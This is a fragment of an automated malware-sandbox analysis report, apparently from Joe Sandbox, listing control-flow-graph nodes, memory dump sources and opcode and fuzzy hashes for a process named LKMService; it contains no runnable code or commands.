                  control_flow_graph 2857 2bb9a30-2bb9a65 2858 2bb9a72-2bb9a7e 2857->2858 2859 2bb9a67-2bb9a6a 2857->2859 2860 2bb9aaa-2bb9adc 2858->2860 2861 2bb9a80-2bb9aa9 2858->2861 2859->2858 2864 2bb9ae1-2bb9b15 call 2bb9a30 2860->2864 2867 2bb9b1b-2bb9b4c call 2bb8c38 2864->2867 2871 2bb9b6f-2bb9b99 2867->2871 2872 2bb9b4e-2bb9b69 2867->2872 2871->2867 2875 2bb9b9b-2bb9be5 2871->2875 2872->2871 2875->2872 2877 2bb9beb-2bb9c25 2875->2877 2880 2bb9c2b-2bb9c4c 2877->2880 2881 2bb9db2-2bb9dda call 2bb98a0 2877->2881 2880->2867 2886 2bb9c52-2bb9c7a 2880->2886 2881->2871 2885 2bb9de0-2bb9e0c 2881->2885 2887 2bb9e5f-2bb9eb8 call 2bb98a0 call 2bb1098 call 2bb8d68 2885->2887 2888 2bb9e0e-2bb9e1a 2885->2888 2886->2872 2889 2bb9c80 2886->2889 2919 2bb9ebd-2bb9f23 2887->2919 2888->2867 2890 2bb9e20-2bb9e24 2888->2890 2892 2bb9d91-2bb9da6 2889->2892 2895 2bb9e2a-2bb9e4e 2890->2895 2896 2bba032-2bba046 2890->2896 2893 2bb9dac 2892->2893 2894 2bb9c85-2bb9ca6 call 2bb9a30 2892->2894 2893->2881 2910 2bb9ca8-2bb9cb4 2894->2910 2911 2bb9ce2-2bb9cf2 2894->2911 2898 2bba04d-2bba15e call 2bb95b0 2895->2898 2899 2bb9e54-2bb9e59 2895->2899 2896->2898 2899->2887 2899->2896 2910->2864 2913 2bb9cba-2bb9cdc 2910->2913 2911->2864 2915 2bb9cf8-2bb9d8e call 2bb98a0 2911->2915 2913->2911 2915->2892 2921 2bb9f46-2bb9f52 2919->2921 2923 2bb9f25-2bb9f33 2921->2923 2924 2bb9f54-2bb9f63 2921->2924 2925 2bb9f7a 2923->2925 2926 2bb9f35-2bb9f41 2923->2926 2924->2923 2931 2bb9f65-2bb9f78 2924->2931 2929 2bb9f7f 2925->2929 2926->2921 2929->2896 2931->2929
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0fc8c02e42c9133c576e66b54dc8e3955554e14d1fe2ba3387497ca98460f38f
                  • Instruction ID: 674b991f8e4f95e6ef20f341101918d358aa677afc84c6fd4d3e7fbec2f9ddc3
                  • Opcode Fuzzy Hash: 0fc8c02e42c9133c576e66b54dc8e3955554e14d1fe2ba3387497ca98460f38f
                  • Instruction Fuzzy Hash: D402F172B006158FDB14DE79D8D46AEBBE3BF98300F5581A9E509EB351DBB0AC46CB40

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2934 2bbc3d8-2bbc3e2 2935 2bbc3e4-2bbc3f3 call 2bbab78 2934->2935 2938 2bbc3f5-2bbc409 2935->2938 2940 2bbc41b-2bbc429 2938->2940 2941 2bbc40b-2bbc411 2938->2941 2940->2938 2943 2bbc42b-2bbc48f 2940->2943 2941->2935 2942 2bbc413-2bbc41a 2941->2942 2947 2bbc494-2bbc4aa 2943->2947 2949 2bbc4b0 2947->2949 2950 2bbc536-2bbc582 2947->2950 2951 2bbc4b6-2bbc4ba 2949->2951 2957 2bbc588 2950->2957 2958 2bbc7c0-2bbc7d4 2950->2958 2952 2bbc4bc-2bbc4c2 2951->2952 2953 2bbc4f1-2bbc501 2951->2953 2955 2bbc4c8-2bbc4d7 2952->2955 2956 2bbc58f-2bbc5af 2952->2956 2976 2bbc503-2bbc50c 2953->2976 2977 2bbc524 2953->2977 2955->2953 2983 2bbc4d9-2bbc4e1 2955->2983 3017 2bbc992-2bbc999 2956->3017 2957->2956 2961 2bbc64a-2bbc663 2957->2961 2962 2bbc5d9-2bbc5fa 2957->2962 2963 2bbc72f-2bbc74f 2957->2963 2964 2bbc68e-2bbc6ae 2957->2964 2965 2bbc77d-2bbc791 2957->2965 2966 2bbc6fc-2bbc704 2957->2966 2967 2bbc6b3-2bbc6d2 call 2bb99a0 2957->2967 2968 2bbc6d7-2bbc6e3 2957->2968 2969 2bbc625-2bbc645 2957->2969 2970 2bbc5b4-2bbc5d4 2957->2970 2971 2bbc754-2bbc778 2957->2971 2959 2bbc7da-2bbc7f9 2958->2959 2960 2bbc4e3-2bbc4ee 2958->2960 2997 2bbc7fb-2bbc7ff 2959->2997 2998 2bbc840-2bbc86e 2959->2998 2960->2953 2961->2947 2979 2bbc669-2bbc689 2961->2979 2962->2955 2974 2bbc600-2bbc620 2962->2974 2963->3017 2964->3017 2965->2951 2975 2bbc797-2bbc7bb 2965->2975 2966->2947 2978 2bbc70a-2bbc72a 2966->2978 2967->3017 3007 2bbc6eb-2bbc6f7 2968->3007 2969->3017 2970->3017 2971->3017 2974->3017 2975->3017 2987 2bbc50e-2bbc511 2976->2987 2988 2bbc513-2bbc520 2976->2988 2991 2bbc527 2977->2991 2978->3017 2979->3017 2983->2947 2983->2960 2996 2bbc522 2987->2996 2988->2996 3066 2bbc529 call 2bbcc79 2991->3066 3067 2bbc529 call 2bbcc88 2991->3067 2996->2991 3010 2bbc801-2bbc803 2997->3010 3011 2bbc805-2bbc80e 2997->3011 3025 2bbc8c1-2bbc8d4 2998->3025 3026 2bbc870-2bbc874 2998->3026 3007->3017 3009 2bbc52f-2bbc531 3009->3017 3018 2bbc823-2bbc83b 3010->3018 3019 2bbc81d-2bbc820 3011->3019 3020 2bbc810-2bbc813 3011->3020 3018->3017 3019->3018 3020->3019 3045 2bbc906-2bbc91c 3025->3045 3046 2bbc8d6-2bbc8e2 3025->3046 3033 2bbc886-2bbc88f 3026->3033 3034 2bbc876-2bbc87c 3026->3034 3041 2bbc89e-2bbc8a1 3033->3041 3042 2bbc891-2bbc894 3033->3042 3034->2947 3040 2bbc882-2bbc884 3034->3040 3044 2bbc8a4-2bbc8bc 3040->3044 3041->3044 3042->3041 3044->3017 3052 2bbc97a-2bbc990 call 2bb8f70 3045->3052 3053 2bbc91e-2bbc928 3045->3053 3046->2953 3048 2bbc8e8-2bbc901 3046->3048 3048->3017 3052->3017 3055 2bbc92a-2bbc947 3053->3055 3056 2bbc949-2bbc951 3053->3056 3059 2bbc953-2bbc978 3055->3059 3056->3059 3059->3017 3066->3009 3067->3009
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 983255e1b02e9f15862bb5b0b30e61ac37fec9c375fad91d99af410b5ee56e13
                  • Instruction ID: 006047bcddae6a0067fea7b63d9806147f5c83e15946def0b85a60ec38ba57a5
                  • Opcode Fuzzy Hash: 983255e1b02e9f15862bb5b0b30e61ac37fec9c375fad91d99af410b5ee56e13
                  • Instruction Fuzzy Hash: 26E1D875F001268FCB16EB6CC8545BE7BE2BF88210B1548AAD946EB391DFB49C02C7D5
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9cef87db19e4cea6c911459ed043b5cb342d6971bcc49cd05d3fc4323e8600c5
                  • Instruction ID: be6d60c5e87341f976ac0702d1eb69188d31b4c3d6e25ea314be121740329ca4
                  • Opcode Fuzzy Hash: 9cef87db19e4cea6c911459ed043b5cb342d6971bcc49cd05d3fc4323e8600c5
                  • Instruction Fuzzy Hash: 8EA1F472E002298BCB11DEA9C8845EEBBF2AF48310B5A85A6DC05FB351E775DD45CBD0
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dca6ebe3c5a801c90e857517e70d8ab1a32c7b2d27621018400f3d5838f59297
                  • Instruction ID: 32ebe8e17058aec8ad826a458fd6f382062da849c8a74b6fb5478f29055c8c48
                  • Opcode Fuzzy Hash: dca6ebe3c5a801c90e857517e70d8ab1a32c7b2d27621018400f3d5838f59297
                  • Instruction Fuzzy Hash: 1E41D372E002289FDB15EFA8D8547EEBAF2AF48214F154196D912BB390CBB58D05CBD0
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 34e01b7ad31a2ce9ea6ac37e800018051db64fce0b784f93a46bf7e7b42bb403
                  • Instruction ID: 88f86ae21e6dc689f2a0fe2f45fb28bb4cc98adbebf7fae25d0ca80f65b89453
                  • Opcode Fuzzy Hash: 34e01b7ad31a2ce9ea6ac37e800018051db64fce0b784f93a46bf7e7b42bb403
                  • Instruction Fuzzy Hash: 74413E34A00209CFDB19DFA8C484AADBBB6FF48314F1484A9E505AB361DBB1E846CF40
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 95e540f05be79e0167669cd2e61c9fad67fd94d227e30c2a232e80cfd3f87de8
                  • Instruction ID: 894037b31a449635fc47039ad51eab7a20e2570bddb64246535deddc6b73c0a7
                  • Opcode Fuzzy Hash: 95e540f05be79e0167669cd2e61c9fad67fd94d227e30c2a232e80cfd3f87de8
                  • Instruction Fuzzy Hash: 1821F036F201258FC754DF7CC4948AABBF6AF9921471500B8E806EB360EB70DC02CB90
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 303604b93bc1c4069fc9500050313bfd02bbef877cac2151641bf3a19f7500a0
                  • Instruction ID: 438b51f07448f5ab3d753e60bb49d15892631996f0c80062449a56df654e29e2
                  • Opcode Fuzzy Hash: 303604b93bc1c4069fc9500050313bfd02bbef877cac2151641bf3a19f7500a0
                  • Instruction Fuzzy Hash: 82117C36B206258F8754DF6CC89489ABBE6AF8921571540B9E906EB360EB70EC01CB90
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5e612567331d172514b35ed80b5bad963ebe54fe4520e15454045caa36b11f5b
                  • Instruction ID: ee85ba320f11cd835a3d62ba0d43645fd3a321009a81bc267e39d149102c5e13
                  • Opcode Fuzzy Hash: 5e612567331d172514b35ed80b5bad963ebe54fe4520e15454045caa36b11f5b
                  • Instruction Fuzzy Hash: 5701C0353002105FC301AB6CD4809AABBA6EFCA36475684EAE549CB322DA75FC02CBD0
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f4aa41415781317f107ce65553d29e1c91c84238a466a7bfd9e676c96f18eacb
                  • Instruction ID: 7e03e8d04e721a39f06b20d03fba4e4c5f96b1e69639e02b108a2da57ee33dd2
                  • Opcode Fuzzy Hash: f4aa41415781317f107ce65553d29e1c91c84238a466a7bfd9e676c96f18eacb
                  • Instruction Fuzzy Hash: B401C075F001048FCB14DA69D8918AEFBB2FFC9314B2045A9C808A7351DA309C46CF90
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369524689.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_132d000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d767c4752da832663dcb49bed8988b3b95605d6b683c7e10099344873222ded
                  • Instruction ID: 2b41719ee55d0578368c08c26d6b97e33e50de035366c3bfb20811572ece3985
                  • Opcode Fuzzy Hash: 1d767c4752da832663dcb49bed8988b3b95605d6b683c7e10099344873222ded
                  • Instruction Fuzzy Hash: 5001F2714083649AE710AAA9CD80B66BF9CEF42238F18C41AEE094A282C6B9D840C671
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4347a4581dd96e8f90bf83b3d1dbf0c76c30a978b67643a412672bc3b74746ac
                  • Instruction ID: a486ef311710ce6add04b853cd9401f841510f0ec1679847185e081e2a50e881
                  • Opcode Fuzzy Hash: 4347a4581dd96e8f90bf83b3d1dbf0c76c30a978b67643a412672bc3b74746ac
                  • Instruction Fuzzy Hash: CB017875B002158F8B18EAA9D8448AEF7B7FFC9364B104969D919A7350DB71AC42CBA0
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369524689.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_132d000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 776ea0877aaa748b83c7e4a79738d43d7d54dc044c972f970258f40637be78e1
                  • Instruction ID: c9c331258d032ccc409a1ac71c6d2870304343af88b8ada1fbe8529fa990114e
                  • Opcode Fuzzy Hash: 776ea0877aaa748b83c7e4a79738d43d7d54dc044c972f970258f40637be78e1
                  • Instruction Fuzzy Hash: 13F0C2714083549EE7118E49CD84B62FFDCEB82638F18C45AED480A286C3B9A840CB71
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ab7c280b3505d3395b2adbbdfbeaa591f38e5ea54745e47d1592c66fc7207e63
                  • Instruction ID: c9632a00f2810ab175ab9be6ae5d84cf9f6307a44aea943eb5137244786003ed
                  • Opcode Fuzzy Hash: ab7c280b3505d3395b2adbbdfbeaa591f38e5ea54745e47d1592c66fc7207e63
                  • Instruction Fuzzy Hash: EDF030357446105FC7669B3994548AA77F79FCA32132401EDD506DB761CA719C06CB90
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 598d75bd020143b08416254a8c43660ceb349ba58059748429c30fad10c1cee5
                  • Instruction ID: a814a78047eb99b1b25b9c1cf1fe2444e7128c68350e2c52b5010c2fc9c7b3a4
                  • Opcode Fuzzy Hash: 598d75bd020143b08416254a8c43660ceb349ba58059748429c30fad10c1cee5
                  • Instruction Fuzzy Hash: FFE04F353104205F8644EB6DD444C1AB3EAEFCEA2531140AAE60ACB331CE61EC018BD4
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4a61d386ec51859675473db5fd237224e25c0f3a28e7cfed5f727cc55293960a
                  • Instruction ID: f5da6cb86dbf344e13c2dc74772584dafd6fcf4387833c332b774f7686db9edd
                  • Opcode Fuzzy Hash: 4a61d386ec51859675473db5fd237224e25c0f3a28e7cfed5f727cc55293960a
                  • Instruction Fuzzy Hash: A1E01A357006108F8725AA3AD41086A73EBAFCA22535404BDD50ADB760CE71EC428B90
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b792cc014cf42417d21329d86485d3239a9bd9ead317f3d9b21d1396300feb31
                  • Instruction ID: 22459614ee5261c57036c122b37351b764bfa38ba076627adfc31a0fd01a324a
                  • Opcode Fuzzy Hash: b792cc014cf42417d21329d86485d3239a9bd9ead317f3d9b21d1396300feb31
                  • Instruction Fuzzy Hash: B0E04F357493508FCB469738A4698A87FA6EF8921532448FDE445DB362DA26DC03CB50
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4f41ba4a85038ac15d9d4483607407d5e9d4f1bb4bd877b2cc229f96eac951e
                  • Instruction ID: 849ddcd5c7859c50f38af8dd2429879a5c3d58ae952bcb1e40304b8bd768a178
                  • Opcode Fuzzy Hash: a4f41ba4a85038ac15d9d4483607407d5e9d4f1bb4bd877b2cc229f96eac951e
                  • Instruction Fuzzy Hash: 70D05E357002108F8B49AB28D40885877EAEF8962535000B9E809CB321DE32EC028B90
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 52a3bd080fa989eabf7faf3f5f5dfd0a0a2bc8d860fa9c86f020ac37f1aa67bb
                  • Instruction ID: bc642af4b4367790debcee45da992c1a8ea74a9d431c260353ee598ccb7ad272
                  • Opcode Fuzzy Hash: 52a3bd080fa989eabf7faf3f5f5dfd0a0a2bc8d860fa9c86f020ac37f1aa67bb
                  • Instruction Fuzzy Hash: 8AD017342081808FC311CB38E4D9C947FB0EF4922032A81EAE889CB273DA21EC05CE00
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
                  • Instruction ID: 9296968168dc781c90d4903bd4a652d90f833b81b725e2d1c3109315a36b6d73
                  • Opcode Fuzzy Hash: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
                  • Instruction Fuzzy Hash: 81C002392542048F8344DB58E588C11B7E9EB4C624316C195E90D8B332C631FC00CA44